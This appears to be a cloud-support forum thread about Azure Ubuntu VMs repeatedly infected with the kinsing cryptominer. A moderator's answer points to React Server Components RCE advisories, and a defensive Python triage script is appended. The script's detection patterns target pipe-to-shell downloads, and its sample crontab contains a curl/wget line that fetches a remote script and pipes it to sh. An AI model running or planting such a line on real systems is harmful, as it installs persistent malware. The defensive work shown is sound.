Ubuntu VM repeatedly compromised with mining malware on Azure

Sahen Ahuja 0 Reputation points
2025-12-20T12:24:44.69+00:00

I'm experiencing a critical security issue where every Ubuntu 24.04 VM I create on Azure gets compromised with cryptocurrency mining malware within 30 minutes.

Setup:
- Region: UAE North
- OS: Ubuntu 24.04 LTS
- SSH port changed to 2222
- Password auth disabled
- NSG rules: SSH only from specific IPs (my laptop + Jenkins server)
- Ports 80/443 public for web app

Issue:
- Mining processes (kdevtmpfsi, kinsing) appear
- Unauthorized SSH keys added
- Cron jobs created for persistence
- Happens consistently across fresh deployments

Security measures taken:
- SSH keys only (no password)
- Custom SSH port (2222)
- Restricted NSG rules
- fail2ban installed
- UFW configured

NSG Configuration:
- Rule 110: SSH (2222) from my IP (my-ip/32)
- Rule 140: SSH (2222) from Jenkins (jenkins-ip/32)
- Rule 120: HTTP (80) from Any
- Rule 130: HTTPS (443) from Any

Questions:
1. Is there a vulnerability in this NSG configuration?
2. Could Jenkins server () be compromised?
3. What's the recommended security architecture for CI/CD + public web app?
4. Are there Azure-specific security measures I'm missing?

I've checked auth logs, activity logs, and followed security best practices but am still experiencing this issue.

Azure Virtual Machines

1 answer

  1. TP 146.4K Reputation points Volunteer Moderator
    2025-12-20T13:25:27.24+00:00

    Hi,

    From your description it appears you have a web app open to the public. Have you patched all known vulnerabilities of the components that make up your web app? For example, the recent React Server Components remote code execution vulnerability has been affecting many people. Please review the articles below:

    Does your app use Next.js? If yes, see below:

    https://nextjs.org/blog/CVE-2025-66478

    Critical Security Vulnerability in React Server Components

    https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

    Defending against the CVE-2025-55182 (React2Shell) vulnerability in React Server Components

    https://www.microsoft.com/en-us/security/blog/2025/12/15/defending-against-the-cve-2025-55182-react2shell-vulnerability-in-react-server-components/

    Please click Accept Answer and upvote if the above was helpful.

    Thanks.

    -TP
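The question lists three concrete indicators on each compromised VM (kinsing/kdevtmpfsi processes, SSH keys nobody added, cron entries for persistence). As an added example, not code from the original post or the moderator's answer, the Python script below checks a host for exactly those three signs so that a fresh deployment can be re-checked quickly after the web app has been patched. The process listing, authorized_keys file, crontab, allowlisted owner key and the 203.0.113.10 address are all constructed sample data; the cron patterns (pipe-to-shell downloaders, execution from /tmp or /dev/shm, base64 decoding) are an assumption about what a miner dropper typically looks like, not something the page states.

```python
"""Host triage for the indicators named in the question (added example, not the
poster's or the moderator's code). Sample inputs are constructed; feed real data
from `ps -eo pid,user,args --no-headers`, every user's ~/.ssh/authorized_keys,
`crontab -l` for each user and the files under /etc/cron.d."""
import re
from dataclasses import dataclass, field

# Process names reported in the question (assumption: the only names we match).
MINER_NAMES = {"kinsing", "kdevtmpfsi"}

# Assumed dropper patterns for cron lines; tune for your environment.
CRON_PATTERNS = [
    r"curl\s+.*\|\s*(ba)?sh",      # curl ... | sh
    r"wget\s+.*\|\s*(ba)?sh",      # wget ... | sh
    r"/tmp/",                      # payload executed from a world-writable dir
    r"/dev/shm/",
    r"base64\s+(-d|--decode)",     # encoded stage being unpacked
]


@dataclass
class Findings:
    miner_processes: list = field(default_factory=list)
    unknown_keys: list = field(default_factory=list)
    suspicious_cron: list = field(default_factory=list)

    def is_compromised(self) -> bool:
        return bool(self.miner_processes or self.unknown_keys or self.suspicious_cron)


def scan_processes(ps_output: str) -> list:
    """Return (pid, user, args) for processes whose executable name is a known miner."""
    hits = []
    for line in ps_output.strip().splitlines():
        parts = line.split(None, 2)          # pid, user, rest of the command line
        if len(parts) < 3:
            continue
        pid, user, args = parts
        exe = args.split()[0].rsplit("/", 1)[-1]   # basename of argv[0]
        if exe in MINER_NAMES:
            hits.append((int(pid), user, args))
    return hits


def scan_authorized_keys(contents: str, known_keys: set) -> list:
    """Return key lines whose 'type base64' material is not in the allowlist.
    Leading options and the trailing comment are ignored for the comparison."""
    unknown = []
    for line in contents.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = re.search(r"(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+)\s+(\S+)", line)
        if not m or f"{m.group(1)} {m.group(2)}" not in known_keys:
            unknown.append(line)
    return unknown


def scan_cron(crontab: str) -> list:
    """Return cron lines matching any of the assumed dropper patterns."""
    return [
        s for s in (ln.strip() for ln in crontab.splitlines())
        if s and not s.startswith("#") and any(re.search(p, s) for p in CRON_PATTERNS)
    ]


def triage(ps_output: str, authorized_keys: str, crontab: str, known_keys: set) -> Findings:
    return Findings(
        scan_processes(ps_output),
        scan_authorized_keys(authorized_keys, known_keys),
        scan_cron(crontab),
    )


# --- constructed sample data (not captured from a real host) ---------------
OWNER_KEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleOwnerKey000000000000000000000000000"
SAMPLE_PS = """\
    1 root     /sbin/init
  812 www-data node /srv/app/server.js
 4711 www-data /tmp/kdevtmpfsi
 4720 www-data /tmp/kinsing -p 4711
"""
SAMPLE_AUTH_KEYS = f"""\
{OWNER_KEY} sahen@laptop
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDInjectedKeyMaterial attacker
"""
SAMPLE_CRON = """\
# m h dom mon dow command
*/1 * * * * (curl -fsSL http://203.0.113.10/x.sh || wget -qO- http://203.0.113.10/x.sh) | sh
0 3 * * * /usr/bin/certbot renew --quiet
"""

if __name__ == "__main__":
    f = triage(SAMPLE_PS, SAMPLE_AUTH_KEYS, SAMPLE_CRON, {OWNER_KEY})
    print("miner processes:", f.miner_processes)
    print("unknown keys:   ", f.unknown_keys)
    print("suspicious cron:", f.suspicious_cron)
    print("compromised:    ", f.is_compromised())
```

Two practical notes: a host where kinsing is already running should be treated as fully compromised and rebuilt from a clean image once the web app is patched, not cleaned in place, because the dropper also replaces binaries and adds keys beyond what this script checks; and if a fresh image with only 80/443 reachable from the Internet is re-infected within minutes, the script confirming the same three indicators again is itself evidence that the entry point is the public web app rather than SSH.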

